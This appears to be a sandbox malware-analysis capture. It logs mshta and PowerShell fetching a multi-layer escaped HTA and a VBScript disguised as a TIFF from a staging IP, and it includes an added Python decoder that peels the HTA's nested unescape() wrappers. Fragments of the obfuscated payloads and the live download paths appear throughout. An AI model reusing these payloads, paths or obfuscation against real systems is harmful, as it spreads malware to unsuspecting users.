                                                                      Content-Length: 204989
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/hta
                                                                      Data Ascii: <script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253CScript%252520Language%25253D%252527Javascript%252527%25253E%25250A%25253C%252521--%252520HTML%252520Encryption%252520provided%252520by%252520tufat.com%252520--%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252527%2525253C%25252521%25252544%2525254F%25252543%25252554%25252559%25252550%25252545%25252520%25252568%25252574%2525256D%2525256C%2525253E%2525250A%2525253C%2525256D%25252565%25252574%25252561%25252520%25252568%25252574%25252574%25252570%2525252D%25252565%25252571%25252575%25252569%25252576%2525253D%25252522%25252558%2525252D%25252555%25252541%2525252D%25252543%2525256F%2525256D%25252570%25252561%25252574%25252569%25252562%2525256C%25252565%25252522%25252520%25252563%2525256F%2525256E%25252574%25252565%2525256E%25252574%2525253D%25252522%
                                                                      Nov 28, 2024 07:28:05.785836935 CET | 1236 | IN | Data Raw: 32 35 32 35 32 35 34 39 25 32 35 32 35 32 35 34 35 25 32 35 32 35 32 35 33 44 25 32 35 32 35 32 35 34 35 25 32 35 32 35 32 35 36 44 25 32 35 32 35 32 35 37 35 25 32 35 32 35 32 35 36 43 25 32 35 32 35 32 35 36 31 25 32 35 32 35 32 35 37 34 25 32
                                                                      Data Ascii: 25252549%25252545%2525253D%25252545%2525256D%25252575%2525256C%25252561%25252574%25252565%25252549%25252545%25252538%25252522%25252520%2525253E%2525250A%2525253C%25252568%25252574%2525256D%2525256C%2525253E%2525250A%2525253C%25252562%2525256F%
                                                                      Nov 28, 2024 07:28:05.785846949 CET | 1236 | IN | Data Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35
                                                                      Data Ascii: 52520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
                                                                      Nov 28, 2024 07:28:05.785981894 CET | 1236 | IN | Data Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32
                                                                      Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252525
                                                                      Nov 28, 2024 07:28:05.786034107 CET | 1236 | IN | Data Raw: 32 35 32 35 32 35 34 35 25 32 35 32 35 32 35 35 36 25 32 35 32 35 32 35 37 31 25 32 35 32 35 32 35 36 39 25 32 35 32 35 32 35 35 41 25 32 35 32 35 32 35 36 39 25 32 35 32 35 32 35 34 34 25 32 35 32 35 32 35 34 44 25 32 35 32 35 32 35 34 31 25 32
                                                                      Data Ascii: 25252545%25252556%25252571%25252569%2525255A%25252569%25252544%2525254D%25252541%25252566%2525257A%25252565%2525257A%25252570%2525254B%2525256F%25252542%25252542%25252568%2525254C%2525256C%25252546%2525254E%2525257A%2525256A%2525256B%25252553%
                                                                      Nov 28, 2024 07:28:05.786045074 CET | 1236 | IN | Data Raw: 35 32 35 34 46 25 32 35 32 35 32 35 34 44 25 32 35 32 35 32 35 37 39 25 32 35 32 35 32 35 35 38 25 32 35 32 35 32 35 36 38 25 32 35 32 35 32 35 34 34 25 32 35 32 35 32 35 37 37 25 32 35 32 35 32 35 35 30 25 32 35 32 35 32 35 34 35 25 32 35 32 35
                                                                      Data Ascii: 5254F%2525254D%25252579%25252558%25252568%25252544%25252577%25252550%25252545%25252543%25252555%25252546%25252556%25252543%25252569%25252569%25252572%2525256D%25252573%25252562%2525254B%25252578%25252565%25252566%25252557%2525254D%25252548%252
                                                                      Nov 28, 2024 07:28:05.786268950 CET | 776 | IN | Data Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32
                                                                      Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252525
                                                                      Nov 28, 2024 07:28:05.786281109 CET | 1236 | IN | Data Raw: 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25
                                                                      Data Ascii: %25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520
                                                                      Nov 28, 2024 07:28:05.786292076 CET | 1236 | IN | Data Raw: 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32
                                                                      Data Ascii: 252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25
                                                                      Nov 28, 2024 07:28:05.786303043 CET | 1236 | IN | Data Raw: 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35
                                                                      Data Ascii: 520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252
                                                                      Nov 28, 2024 07:28:05.906258106 CET | 1236 | IN | Data Raw: 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25
                                                                      Data Ascii: %25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      1 | 192.168.2.22 | 49166 | 172.245.123.29 | 80 | 3948 | C:\Windows\System32\mshta.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 07:28:10.124236107 CET | 426 | OUT | GET /1343/erg/seemebestthings.hta HTTP/1.1
                                                                      Accept: */*
                                                                      Accept-Language: fr-FR
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Range: bytes=8896-
                                                                      Connection: Keep-Alive
                                                                      Host: 172.245.123.29
                                                                      If-Range: "320bd-627df8e9c34e4"
                                                                      Nov 28, 2024 07:28:11.299926043 CET | 1236 | IN | HTTP/1.1 206 Partial Content
                                                                      Date: Thu, 28 Nov 2024 06:28:10 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                      Last-Modified: Wed, 27 Nov 2024 07:03:04 GMT
                                                                      ETag: "320bd-627df8e9c34e4"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 196093
                                                                      Content-Range: bytes 8896-204988/204989
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/hta
                                                                      Data Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 [TRUNCATED]
                                                                      Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525
                                                                      Nov 28, 2024 07:28:11.299945116 CET | 1236 | IN | Data Raw: 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32
                                                                      Data Ascii: 2520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525252C%25252520%25252520%25252520%25252520%2525
                                                                      Nov 28, 2024 07:28:11.299957037 CET | 1236 | IN | Data Raw: 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30
                                                                      Data Ascii: 0%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525252
                                                                      Nov 28, 2024 07:28:11.300055027 CET | 1236 | IN | Data Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35
                                                                      Data Ascii: 5252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
                                                                      Nov 28, 2024 07:28:11.300067902 CET | 1236 | IN | Data Raw: 32 35 35 32 25 32 35 32 35 32 35 36 45 25 32 35 32 35 32 35 37 32 25 32 35 32 35 32 35 37 37 25 32 35 32 35 32 35 35 31 25 32 35 32 35 32 35 34 32 25 32 35 32 35 32 35 36 32 25 32 35 32 35 32 35 36 37 25 32 35 32 35 32 35 34 41 25 32 35 32 35 32
                                                                      Data Ascii: 2552%2525256E%25252572%25252577%25252551%25252542%25252562%25252567%2525254A%2525257A%25252555%25252546%25252571%25252548%25252578%25252566%25252543%25252554%25252569%25252562%25252550%2525256E%25252550%25252557%25252561%25252570%25252559%2525
                                                                      Nov 28, 2024 07:28:11.300081968 CET | 1236 | IN | Data Raw: 30 25 32 35 32 35 32 35 36 33 25 32 35 32 35 32 35 34 43 25 32 35 32 35 32 35 36 37 25 32 35 32 35 32 35 34 36 25 32 35 32 35 32 35 37 32 25 32 35 32 35 32 35 36 41 25 32 35 32 35 32 35 36 38 25 32 35 32 35 32 35 34 37 25 32 35 32 35 32 35 36 45
                                                                      Data Ascii: 0%25252563%2525254C%25252567%25252546%25252572%2525256A%25252568%25252547%2525256E%25252547%25252579%25252556%25252553%2525254E%25252545%25252572%25252542%2525256A%2525256C%25252563%25252554%25252557%2525254E%25252567%2525254D%25252570%2525256
                                                                      Nov 28, 2024 07:28:11.300307035 CET | 1236 | IN | Data Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35
                                                                      Data Ascii: 5252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
                                                                      Nov 28, 2024 07:28:11.300319910 CET | 1236 | IN | Data Raw: 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32
                                                                      Data Ascii: 2520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525
                                                                      Nov 28, 2024 07:28:11.300332069 CET | 1236 | IN | Data Raw: 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 33 41 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30
                                                                      Data Ascii: 0%25252520%2525253A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525252
                                                                      Nov 28, 2024 07:28:11.300343990 CET | 1236 | IN | Data Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35
                                                                      Data Ascii: 5252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
                                                                      Nov 28, 2024 07:28:11.420274019 CET | 1236 | IN | Data Raw: 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32
                                                                      Data Ascii: 2520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525
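The HTA body in this session is the "HTML Encryption provided by tufat.com" wrapper: each layer is a one-line script that assigns a percent-escaped copy of the next layer to `m` and hands it to `document.write(unescape(m))`, and the innermost layer calls `document.write(unescape('...'))` on the escaped page. Four rounds of `unescape()` over the prefix captured at the start of the preceding response turn `%2525253C%25252521%25252544` and what follows into `<!DOCTYPE html>` and then `<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >`. This session is also a resumed fetch (`Range: bytes=8896-` with an `If-Range` matching the ETag, answered `206 Partial Content`), so the body shown here begins mid-payload; the wrapper's opening is the Data Ascii line beginning `<script language=JavaScript>m='` in the response above it.

The decoder below is an added example written for this page, not code from the report or from the sample. The captured prefix constant is copied from that Data Ascii line, cut off where the capture is; the three-wrapper sample it also decodes is constructed here on the assumption that every layer has the same shape as the captured ones.

```python
import re

# What JavaScript unescape() decodes: %uXXXX (a UTF-16 code unit) and %XX (one byte, Latin-1).
_JS_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
# Characters JavaScript escape() leaves as they are.
_JS_SAFE = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@*_+-./")
# The two literal shapes the wrapper uses: m='<escaped next layer>' and unescape('<escaped html>').
# The closing quote is optional so a truncated capture still decodes as far as its bytes allow.
_ASSIGN = re.compile(r"\bm\s*=\s*'([^']*)'?")
_WRITE = re.compile(r"unescape\(\s*'([^']*)'?")


def js_unescape(s: str) -> str:
    """Python equivalent of JavaScript unescape(); a '%' that starts no valid escape is kept."""
    return _JS_ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def js_escape(s: str) -> str:
    """Python equivalent of JavaScript escape(); used here only to build the constructed sample."""
    return "".join(
        c if c in _JS_SAFE else ("%%%02X" % ord(c) if ord(c) < 256 else "%%u%04X" % ord(c))
        for c in s
    )


def layers(text: str, max_depth: int = 16):
    """Yield each successively decoded layer until no wrapper literal is left (or max_depth)."""
    for _ in range(max_depth):
        m = _ASSIGN.search(text) or _WRITE.search(text)
        if not m:
            return
        text = js_unescape(m.group(1))
        yield text


def peel(text: str) -> str:
    """Return the innermost decoded content of a nested escape() wrapper."""
    final = text
    for final in layers(text):
        pass
    return final


def build_sample(html: str, wrappers: int = 3) -> str:
    """Constructed sample (assumption: every layer has the shape seen in the capture)."""
    layer = ("<Script Language='Javascript'>\n<!--\ndocument.write(unescape('"
             + js_escape(html) + "'))\n//-->\n</Script>")
    for _ in range(wrappers):
        layer = ("<script language=JavaScript>m='" + js_escape(layer)
                 + "';document.write(unescape(m))</script>")
    return layer


SAMPLE_HTML = ('<!DOCTYPE html>\n<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >\n'
               '<html>\n<body>constructed sample</body>\n</html>\n')

# Copied from the Data Ascii line of the preceding response; cut off where the capture is.
CAPTURED_HTA_PREFIX = (
    "<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27"
    "%253Cscript%2520language%253DJavaScript%253Em%253D%2527"
    "%25253CScript%252520Language%25253D%252527Javascript%252527%25253E%25250A"
    "%25253C%252521--%252520HTML%252520Encryption%252520provided%252520by%252520tufat.com%252520--%25253E%25250A"
    "%25253C%252521--%25250Adocument.write%252528unescape%252528%252527"
    "%2525253C%25252521%25252544%2525254F%25252543%25252554%25252559%25252550%25252545%25252520"
    "%25252568%25252574%2525256D%2525256C%2525253E%2525250A"
    "%2525253C%2525256D%25252565%25252574%25252561%25252520%25252568%25252574%25252574%25252570%2525252D"
    "%25252565%25252571%25252575%25252569%25252576%2525253D%25252522%25252558%2525252D%25252555%25252541"
    "%2525252D%25252543%2525256F%2525256D%25252570%25252561%25252574%25252569%25252562%2525256C%25252565"
    "%25252522%25252520%25252563%2525256F%2525256E%25252574%25252565%2525256E%25252574%2525253D%25252522%"
)

if __name__ == "__main__":
    print(sum(1 for _ in layers(CAPTURED_HTA_PREFIX)), "layers")
    print(peel(CAPTURED_HTA_PREFIX))
```

Decoding the literal each layer feeds to `unescape()`, rather than running the whole string through a URL-decoder repeatedly, is what keeps the outer `<script>` wrappers from piling up in the output; the depth limit stops a crafted input from looping.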


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      2 | 192.168.2.22 | 49167 | 172.245.123.29 | 80 | 3148 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 07:28:16.699031115 CET | 382 | OUT | GET /1343/seemebestthingswithentirethingswithgreatnaturethings.tIF HTTP/1.1
                                                                      Accept: */*
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: 172.245.123.29
                                                                      Connection: Keep-Alive
                                                                      Nov 28, 2024 07:28:17.864547014 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                      Date: Thu, 28 Nov 2024 06:28:17 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                      Last-Modified: Wed, 27 Nov 2024 06:47:30 GMT
                                                                      ETag: "28a2e-627df56f0eef7"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 166446
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: image/tiff
                                                                      Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 4b 00 4c 00 63 00 76 00 4b 00 57 00 5a 00 4c 00 4c 00 42 00 47 00 42 00 67 00 69 00 4c 00 20 00 3d 00 20 00 22 00 4b 00 57 00 74 00 72 00 69 00 63 00 6c 00 69 00 6e 00 69 00 61 00 72 00 63 00 68 00 61 00 4c 00 6a 00 78 00 6d 00 71 00 41 00 63 00 41 00 55 00 61 00 72 00 22 00 0d 00 0a 00 67 00 62 00 68 00 78 00 47 00 50 00 70 00 4b 00 6d 00 55 00 6f 00 62 00 57 00 51 00 70 00 20 00 3d 00 20 00 22 00 63 00 63 00 57 00 62 00 4e 00 57 00 6b 00 4f 00 6b 00 69 00 4c 00 55 00 69 00 48 00 41 00 22 00 0d 00 0a 00 53 00 41 00 4b 00 4e 00 74 00 6e 00 65 00 6b 00 41 00 50 00 55 00 57 00 4c 00 7a 00 7a 00 20 00 3d 00 20 00 22 00 62 00 57 00 4b 00 69 00 42 00 4b 00 68 00 48 00 47 00 65 00 64 00 64 00 43 00 4b 00 62 00 22 00 0d 00 0a 00 6d 00 57 00 61 00 4a 00 61 00 6d 00 6f 00 50 00 70 00 76 00 5a 00 68 00 4e 00 69 00 6b 00 20 00 3d 00 20 00 22 00 7a 00 6f 00 53 00 41 00 4b 00 6e 00 64 00 4f 00 65 00 57 00 71 00 47 00 4f 00 4c 00 63 00 22 00 0d 00 0a 00 4b 00 43 00 49 00 4c 00 61 00 [TRUNCATED]
                                                                      Data Ascii: KLcvKWZLLBGBgiL = "KWtricliniarchaLjxmqAcAUar"gbhxGPpKmUobWQp = "ccWbNWkOkiLUiHA"SAKNtnekAPUWLzz = "bWKiBKhHGeddCKb"mWaJamoPpvZhNik = "zoSAKndOeWqGOLc"KCILabRxPJWtGug = "SHfgJRLecZPciri"KcbLxLpacthuWbZ = "IphWpmhgGBdKJqB"LdGWAahkcPLLkWP = "ALKfWbzcKGmOJmW"cKiQWWnvILlLWCu = "WZmGqqLtiLZRKJc"tpcWPnPWGHPdOmK = "oRRCNWeUeLzLvpO"sUAlHkxLgGKkocu = "kimAjIiexLqPlxu"ZlLAiKTpcRKLIKi = "KgWhpdBaKKLhKCu"omLLmLCjzULzLBA = "WmuWvBWgLzhOhcL
                                                                      Nov 28, 2024 07:28:17.864597082 CET | 1236 | IN | Data Raw: 00 22 00 0d 00 0a 00 6a 00 63 00 71 00 53 00 57 00 63 00 4f 00 5a 00 57 00 70 00 4e 00 41 00 69 00 75 00 74 00 20 00 3d 00 20 00 22 00 64 00 7a 00 47 00 68 00 4c 00 5a 00 68 00 4c 00 41 00 4a 00 6b 00 57 00 4e 00 68 00 57 00 22 00 0d 00 0a 00 61
                                                                      Data Ascii: "jcqSWcOZWpNAiut = "dzGhLZhLAJkWNhW"adUefNkWkWoNKLx = "zCrczvLBbkcpine"KcGKLqdZeIGOLWb = "LLLrUzKWrWiJkWk"oGLKLRp
                                                                      Nov 28, 2024 07:28:17.864609003 CET | 448 | IN | Data Raw: 00 42 00 63 00 47 00 6c 00 57 00 4a 00 71 00 4b 00 6d 00 52 00 61 00 66 00 61 00 22 00 0d 00 0a 00 6c 00 6d 00 57 00 6c 00 4b 00 57 00 62 00 76 00 67 00 71 00 74 00 61 00 6b 00 4c 00 70 00 20 00 3d 00 20 00 22 00 7a 00 57 00 4b 00 4e 00 65 00 4f
                                                                      Data Ascii: BcGlWJqKmRafa"lmWlKWbvgqtakLp = "zWKNeOvzffktSkA"UnKdrRtricliniarchaQeicWJB = "RbZHWWUABIWCLZA"LZkbuoPpmbKeGQq =
                                                                      Nov 28, 2024 07:28:17.864752054 CET | 1236 | IN | Data Raw: 00 64 00 42 00 7a 00 74 00 4e 00 20 00 3d 00 20 00 22 00 4c 00 52 00 4b 00 57 00 6f 00 52 00 75 00 72 00 4c 00 62 00 4c 00 4f 00 64 00 4f 00 6d 00 22 00 0d 00 0a 00 66 00 7a 00 43 00 51 00 4b 00 69 00 55 00 64 00 47 00 71 00 57 00 7a 00 69 00 6d
                                                                      Data Ascii: dBztN = "LRKWoRurLbLOdOm"fzCQKiUdGqWzimU = "fURRhkbbxqdicWA"WcPiUGLgWiheBRN = "BcbZOWcoRNRLmIL"eWkbLpxjqlKOiLW = "W
                                                                      Nov 28, 2024 07:28:17.864763021 CET | 1236 | IN | Data Raw: 00 69 00 68 00 22 00 0d 00 0a 00 51 00 4c 00 47 00 69 00 42 00 69 00 4e 00 4b 00 47 00 61 00 4e 00 57 00 4c 00 6c 00 62 00 20 00 3d 00 20 00 22 00 6c 00 55 00 4b 00 4e 00 47 00 7a 00 4c 00 63 00 4c 00 6a 00 47 00 57 00 6b 00 41 00 65 00 22 00 0d
                                                                      Data Ascii: ih"QLGiBiNKGaNWLlb = "lUKNGzLcLjGWkAe"bcefOWzZPamfftb = "GmoJqAfWLfoikch"aGzLWhfqjoHejWL = "cRnKLWkLcugKicz"IPLKI
                                                                      Nov 28, 2024 07:28:17.864773989 CET | 1236 | IN | Data Raw: 00 74 00 62 00 4c 00 52 00 74 00 75 00 67 00 4c 00 6f 00 68 00 78 00 22 00 0d 00 0a 00 4c 00 43 00 42 00 63 00 50 00 4b 00 6b 00 57 00 6d 00 68 00 57 00 75 00 61 00 63 00 57 00 20 00 3d 00 20 00 22 00 6d 00 75 00 68 00 43 00 47 00 6b 00 55 00 48
                                                                      Data Ascii: tbLRtugLohx"LCBcPKkWmhWuacW = "muhCGkUHdPoKhWL"WbCWqLifoicKurW = "LWLLbKOneclgLKb"OhWilWrUpurHWKA = "TfOilWWBzhnqei
                                                                      Nov 28, 2024 07:28:17.864790916 CET | 1236 | IN | Data Raw: 00 22 00 0d 00 0a 00 4c 00 63 00 4b 00 55 00 7a 00 52 00 75 00 71 00 6b 00 4b 00 52 00 4b 00 47 00 55 00 47 00 20 00 3d 00 20 00 22 00 63 00 50 00 41 00 42 00 4b 00 6b 00 57 00 69 00 6d 00 50 00 70 00 50 00 68 00 4a 00 4c 00 22 00 0d 00 0a 00 4c
